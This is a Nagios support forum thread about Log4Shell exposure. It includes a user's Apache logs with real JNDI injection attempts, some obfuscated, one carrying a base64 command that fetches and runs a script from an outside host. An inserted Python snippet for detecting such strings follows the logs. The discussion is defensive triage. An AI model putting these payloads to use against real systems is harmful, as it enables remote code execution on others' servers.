Log4Shell vulnerability
Posted: Mon Dec 13, 2021 2:59 pm
by mejokj
Hi Team,
Is Nagios affected by the Log4Shell vulnerability, and is there any security advisory for it?
Thanks
Re: Log4Shell vulnerability
Posted: Mon Dec 13, 2021 5:38 pm
by benjaminsmith
Hi mejokj,
Thanks for contacting the support team at Nagios.
We have an update with more information on this vulnerability on our company blog at:
https://www.nagios.com/news/2021/12/upd ... erability/
Regards,
Benjamin
Re: Log4Shell vulnerability
Posted: Tue Dec 14, 2021 12:45 pm
by mejokj
Thanks, Benjamin, for the reply.
We have gone through the document and understood that no impact has been discovered for Nagios so far.
And currently, there is no action required for the Log4j vulnerability, right?
And how do we confirm from our side? Is there anything we can check?
Re: Log4Shell vulnerability
Posted: Tue Dec 14, 2021 2:10 pm
by benjaminsmith
Hi,
If you've installed any Java-based packages on your systems, my recommendation would be to reach out to your admins/security teams to search your systems for the impacted version of this package.
Regards,
Benjamin
Re: Log4Shell vulnerability
Posted: Tue Dec 14, 2021 6:54 pm
by DonForigua
Hi, seeing the Apache logs I have:
167.71.13.196 - - [14/Dec/2021:10:15:44 -0500] "PUT ${jndi:ldap://167.71.13.196:9876/7b22536f7572636555726c223a22687474703a2f2f3139302e3134332e3130392e3137363a3830222c225061796c6f6164536f75726365223a22485454502d4745542
22c22497373756544617465223a22323032312d31322d31345431353a31353a34342e3535373734353039375a227d649eb0f26bf2b0c4880aca4a844a5cfb} HTTP/1.1\n" 400 226 "-" "-"
167.71.13.196 - - [14/Dec/2021:10:16:22 -0500] "PUT ${jndi:ldap://167.71.13.196:9876/7b22536f7572636555726c223a22687474703a2f2f3139302e3134332e3130392e3137363a3830222c225061796c6f6164536f75726365223a22485454502d4745542
22c22497373756544617465223a22323032312d31322d31345431353a31363a32322e3233343636373236355a227d7d83c441b293c5626d9493d671407547} HTTP/1.1\n" 400 226 "-" "-"
167.71.13.196 - - [14/Dec/2021:10:17:24 -0500] "PUT ${jndi:ldap://167.71.13.196:9876/7b22536f7572636555726c223a22687474703a2f2f3139302e3134332e3130392e3137363a3830222c225061796c6f6164536f75726365223a22485454502d4745542
22c22497373756544617465223a22323032312d31322d31345431353a31373a32342e3636373437363939345a227d755c304a1590c222821a248253a08e3d} HTTP/1.1\n" 400 226 "-" "-"
167.71.13.196 - - [14/Dec/2021:10:17:25 -0500] "PUT ${jndi:ldap://167.71.13.196:9876/7b22536f7572636555726c223a22687474703a2f2f3139302e3134332e3130392e3137363a3830222c225061796c6f6164536f75726365223a22485454502d4745542
22c22497373756544617465223a22323032312d31322d31345431353a31373a32352e3231363433333931395a227d9a7d3bb2ff411b9afaa13b4629c5b159} HTTP/1.1\n" 400 226 "-" "-"
195.54.160.149 - - [14/Dec/2021:16:28:45 -0500] "GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xOTAuMTQzLjEwOS4xNzY6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4N
zQvMTkwLjE0My4xMDkuMTc2OjgwKXxiYXNo} HTTP/1.1" 200 3245 "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xOTAuMTQzLjEwOS4xNzY6ODB8fHdnZ
XQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTkwLjE0My4xMDkuMTc2OjgwKXxiYXNo}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8
xOTAuMTQzLjEwOS4xNzY6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTkwLjE0My4xMDkuMTc2OjgwKXxiYXNo}"
The last line has HTTP/1.1 200; was the attack successful?
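An added example, not part of the original post or of any Nagios code: a Python check that finds JNDI lookup strings in Apache combined-format log lines, including the two nested-lookup obfuscations visible in the lines above, and reports which field carried them alongside the status Apache returned. The sample lines, hosts and addresses are constructed, and the status code only records how Apache answered the request, not whether any Log4j instance behind it evaluated the string.

```python
import re

# Apache combined format: ip ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>.*?)" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>.*?)" "(?P<agent>.*?)")?\s*$'
)
# Innermost nested lookups of the two forms in the posted logs:
#   ${lower:l} -> l    and    ${::-j} -> j
NESTED_RE = re.compile(r'\$\{(?:lower:|::-)([^${}]*)\}', re.IGNORECASE)


def normalize(value, max_rounds=10):
    """Collapse nested lookups repeatedly so an obfuscated string reads ${jndi:...}."""
    for _ in range(max_rounds):
        collapsed = NESTED_RE.sub(lambda m: m.group(1), value)
        if collapsed == value:
            break
        value = collapsed
    return value.lower()


def scan(lines):
    """Return one finding per log line that carries a JNDI lookup in any field."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line)
        # Fall back to the whole line if it does not parse as combined format.
        fields = m.groupdict() if m else {"raw": line}
        hits = [name for name in ("request", "referer", "agent", "raw")
                if fields.get(name) and "${jndi:" in normalize(fields[name])]
        if hits:
            findings.append({"line": lineno, "ip": m.group("ip") if m else None,
                             "status": int(m.group("status")) if m else None,
                             "fields": hits})
    return findings


# Constructed sample lines (documentation addresses, placeholder host and path).
SAMPLE = [
    '192.0.2.10 - - [14/Dec/2021:10:00:01 -0500] "GET /nagios/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [14/Dec/2021:10:15:44 -0500] "PUT ${jndi:ldap://callback.example:1389/a} HTTP/1.1" 400 226 "-" "-"',
    '198.51.100.8 - - [14/Dec/2021:16:28:45 -0500] "GET /?x=${jndi:ldap://callback.example:1389/a} HTTP/1.1" 200 3245 '
    '"${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://callback.example:1389/a}" '
    '"${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://callback.example:1389/a}"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE):
        print(finding)
```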
Re: Log4Shell vulnerability
Posted: Wed Dec 15, 2021 1:59 pm
by gsmith
Hi
You need to work with your admins/security teams to assess any risk you may face.
Nagios Enterprises takes data security and information integrity very seriously. Currently, we are evaluating our use of Apache products and our exposure to the vulnerability described in CVE-2021-44228.
We have updated our company blog with important information on this issue.
https://www.nagios.com/news/2021/12/update-on-apache-log4j-vulnerability/
While Nagios Core, NagiosXI, and Fusion use or depend upon Apache products they do not appear to be using vulnerable versions of the products as identified in the MITRE notification. While Nagios Log Server does use Log4j components and includes plugins for receiving Log4j data, we don't believe the product is vulnerable at this time.
Due to the complexity and flexibility of our products and their ability to integrate into a wide variety of environments care should be taken to limit the exposure of systems to trusted entities.
As always we also recommend that you keep your system up to date and follow the guidance of your operating system vendor and integrated application providers as is appropriate for your environment.
If we discover any vulnerabilities in Nagios software, we will immediately respond and release a fix ASAP. Please check our security page for updates.
https://www.nagios.com/products/security
Thank you